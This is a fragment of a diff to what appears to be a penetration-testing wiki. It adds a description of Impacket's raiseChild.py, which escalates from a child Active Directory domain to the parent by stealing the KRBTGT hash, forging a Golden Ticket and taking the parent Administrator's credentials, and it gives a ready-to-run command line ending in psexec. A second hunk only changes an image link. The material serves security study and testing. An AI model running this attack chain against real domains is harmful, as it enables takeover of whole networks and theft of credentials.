* Obtains the SID for the Enterprise Admins group of the parent domain
|
||||||
|
* Retrieves the hash for the KRBTGT account in the child domain
|
||||||
|
* Creates a Golden Ticket
|
||||||
|
* Logs into the parent domain
|
||||||
|
* Retrieves credentials for the Administrator account in the parent domain
|
||||||
|
* If the `target-exec` switch is specified, it authenticates to the parent domain's Domain Controller via Psexec.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
raiseChild.py -target-exec 10.10.10.10 <child_domain>/username
|
||||||
|
```
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
|
|
|
@ -115,7 +115,7 @@ c:\Users\Public>
|
||||||
|
|
||||||
### Launch a new CMD (if you have RDP access)
|
### Launch a new CMD (if you have RDP access)
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (37) (1).png>)
|
![](<../../.gitbook/assets/image (37).png>)
|
||||||
|
|
||||||
## CLSID Problems
|
## CLSID Problems
|
||||||
|
|
||||||
|
|